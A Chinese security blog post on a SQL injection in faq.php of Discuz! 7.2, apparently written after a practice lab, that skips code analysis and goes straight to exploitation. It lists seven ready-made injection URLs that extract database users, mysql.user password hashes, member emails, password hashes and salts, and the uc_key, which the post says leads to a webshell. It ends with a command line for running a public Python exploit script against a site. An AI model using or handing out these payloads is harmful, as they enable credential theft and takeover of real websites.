www.xiahuhu.cn
关注网络安全

Discuz!7.2 faq.php SQL注入漏洞分析

我有话要说:大锅本站免费分享的资源均来自网络,如有侵权及其他事宜请点击联系我处理

好久没有看墨者学院,今天偶尔登录了下,发现更新了新靶场-CMS系统漏洞分析溯源(第9题),首先登录页面发现是discuz 7.2,7.2版本存在sql注入漏洞,原因是由faq.php文件源码存在漏洞引起的,代码这里就不做分析了,直接看怎么利用。

可利用exp代码

(1)获取mysql用户信息

faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28user%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

(2)获取数据库版本信息

faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

(3)获取数据库信息

faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28database%28%29,floor%28rand%280%29*2%29,0x3a,concat%28user%28%29%29%20%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

(4)获取数据库用户名和密码

faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,password,0x3a)%20from%20mysql.user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23

(5)获取用户名、email、密码和salt信息

faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,email,0x3a,password,0x3a,salt,0x3a,secques%29%20from%20cdb_uc_memberslimit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

(6)获取uc_key(后面利用key写入配置文件config.inc.php getshell)

faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a,(select%20substr(authkey,1,62)%20from%20cdb_uc_applications%20limit%200,1),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23

(7)对指定uid获取密码

faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,email,0x3a,password,0x3a,salt%29%20from%20cdb_uc_memberswhere uid=1 %20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

可利用脚本

网上有python大牛已经写好了工具了,我们拿来用即可。。。

 

EXP利用方法

python dz7.x_faq.py https://www.xiahuhu.cn 10

其中http://www.xiahuhu.cn 为待检测的域名

后面的数字10为dump出多少条数据。

代码不用做任何更改,能直接获取到Current user、user、uc_key已经webshell。

赞(1) 打赏
未经允许不得转载:花生米's Blog » Discuz!7.2 faq.php SQL注入漏洞分析
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏